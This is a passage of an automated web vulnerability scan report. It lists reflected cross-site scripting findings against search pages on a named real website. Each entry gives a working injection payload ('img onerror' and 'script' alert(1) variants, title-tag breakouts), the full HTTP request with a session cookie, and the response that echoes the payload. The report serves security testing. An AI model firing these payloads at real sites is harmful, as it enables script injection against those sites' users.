2.4588. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 23637<img%20src%3da%20onerror%3dalert(1)>9b94cc171c6 was submitted in the REST URL parameter 6. This input was echoed as 23637<img src=a onerror=alert(1)>9b94cc171c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/search.php23637<img%20src%3da%20onerror%3dalert(1)>9b94cc171c6?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/search.php23637<img src=a onerror=alert(1)>9b94cc171c6]</td>
...[SNIP]...

2.4589. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d286<img%20src%3da%20onerror%3dalert(1)>8ebcf502a3bc7f618 was submitted in the REST URL parameter 6. This input was echoed as 4d286<img src=a onerror=alert(1)>8ebcf502a3bc7f618 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/review/search.php4d286<img%20src%3da%20onerror%3dalert(1)>8ebcf502a3bc7f618?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/search.php4d286<img src=a onerror=alert(1)>8ebcf502a3bc7f618]</td>
...[SNIP]...

2.4590. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 9b34b</title><img%20src%3da%20onerror%3dalert(1)>d7b32f9b2cb was submitted in the REST URL parameter 6. This input was echoed as 9b34b</title><img src=a onerror=alert(1)>d7b32f9b2cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/search.php9b34b</title><img%20src%3da%20onerror%3dalert(1)>d7b32f9b2cb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/search.php9b34b</title><img src=a onerror=alert(1)>d7b32f9b2cb</title>
...[SNIP]...

2.4591. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 63013</title><img%20src%3da%20onerror%3dalert(1)>c6cacd39496ee801f was submitted in the REST URL parameter 6. This input was echoed as 63013</title><img src=a onerror=alert(1)>c6cacd39496ee801f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/review/search.php63013</title><img%20src%3da%20onerror%3dalert(1)>c6cacd39496ee801f?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/search.php63013</title><img src=a onerror=alert(1)>c6cacd39496ee801f</title>
...[SNIP]...

2.4592. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload fd8f7</title><img%20src%3da%20onerror%3dalert(1)>c9529da182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd8f7</title><img src=a onerror=alert(1)>c9529da182 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/search.php/fd8f7</title><img%20src%3da%20onerror%3dalert(1)>c9529da182 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/search.php/fd8f7</title><img src=a onerror=alert(1)>c9529da182</title>
...[SNIP]...

2.4593. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6cf5<img%20src%3da%20onerror%3dalert(1)>e5f88303d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6cf5<img src=a onerror=alert(1)>e5f88303d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/search.php/b6cf5<img%20src%3da%20onerror%3dalert(1)>e5f88303d6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/search.php/b6cf5<img src=a onerror=alert(1)>e5f88303d6]</td>
...[SNIP]...

2.4594. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6dc9<script>alert(1)</script>bcec316272dd4f01c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagb6dc9<script>alert(1)</script>bcec316272dd4f01c/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagb6dc9<script>alert(1)</script>bcec316272dd4f01c/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4595. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4e075<script>alert(1)</script>8183dd4a139 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4e075<script>alert(1)</script>8183dd4a139/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4e075<script>alert(1)</script>8183dd4a139/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4596. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb9ae<img%20src%3da%20onerror%3dalert(1)>421becb5a97 was submitted in the REST URL parameter 2. This input was echoed as fb9ae<img src=a onerror=alert(1)>421becb5a97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesfb9ae<img%20src%3da%20onerror%3dalert(1)>421becb5a97/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesfb9ae<img src=a onerror=alert(1)>421becb5a97/kosmos/images/search.php]</td>
...[SNIP]...

2.4597. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c2a54<img%20src%3da%20onerror%3dalert(1)>bf158524dead4838c was submitted in the REST URL parameter 2. This input was echoed as c2a54<img src=a onerror=alert(1)>bf158524dead4838c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themesc2a54<img%20src%3da%20onerror%3dalert(1)>bf158524dead4838c/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesc2a54<img src=a onerror=alert(1)>bf158524dead4838c/kosmos/images/search.php]</td>
...[SNIP]...

2.4598. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 59c9e</title><img%20src%3da%20onerror%3dalert(1)>206506a3f26 was submitted in the REST URL parameter 2. This input was echoed as 59c9e</title><img src=a onerror=alert(1)>206506a3f26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes59c9e</title><img%20src%3da%20onerror%3dalert(1)>206506a3f26/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes59c9e</title><img src=a onerror=alert(1)>206506a3f26/kosmos/images/search.php</title>
...[SNIP]...

2.4599. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 87fc8</title><img%20src%3da%20onerror%3dalert(1)>609ded91758926bb6 was submitted in the REST URL parameter 2. This input was echoed as 87fc8</title><img src=a onerror=alert(1)>609ded91758926bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes87fc8</title><img%20src%3da%20onerror%3dalert(1)>609ded91758926bb6/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes87fc8</title><img src=a onerror=alert(1)>609ded91758926bb6/kosmos/images/search.php</title>
...[SNIP]...

2.4600. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3b73b</title><img%20src%3da%20onerror%3dalert(1)>2f4c68e9760 was submitted in the REST URL parameter 3. This input was echoed as 3b73b</title><img src=a onerror=alert(1)>2f4c68e9760 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos3b73b</title><img%20src%3da%20onerror%3dalert(1)>2f4c68e9760/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos3b73b</title><img src=a onerror=alert(1)>2f4c68e9760/images/search.php</title>
...[SNIP]...

2.4601. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bf48<img%20src%3da%20onerror%3dalert(1)>8732c302322dcf97e was submitted in the REST URL parameter 3. This input was echoed as 3bf48<img src=a onerror=alert(1)>8732c302322dcf97e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos3bf48<img%20src%3da%20onerror%3dalert(1)>8732c302322dcf97e/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos3bf48<img src=a onerror=alert(1)>8732c302322dcf97e/images/search.php]</td>
...[SNIP]...

2.4602. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93f7d<img%20src%3da%20onerror%3dalert(1)>329eb02748f was submitted in the REST URL parameter 3. This input was echoed as 93f7d<img src=a onerror=alert(1)>329eb02748f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos93f7d<img%20src%3da%20onerror%3dalert(1)>329eb02748f/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos93f7d<img src=a onerror=alert(1)>329eb02748f/images/search.php]</td>
...[SNIP]...

2.4603. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 39c71</title><img%20src%3da%20onerror%3dalert(1)>4d24dd761b972f1a3 was submitted in the REST URL parameter 3. This input was echoed as 39c71</title><img src=a onerror=alert(1)>4d24dd761b972f1a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos39c71</title><img%20src%3da%20onerror%3dalert(1)>4d24dd761b972f1a3/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
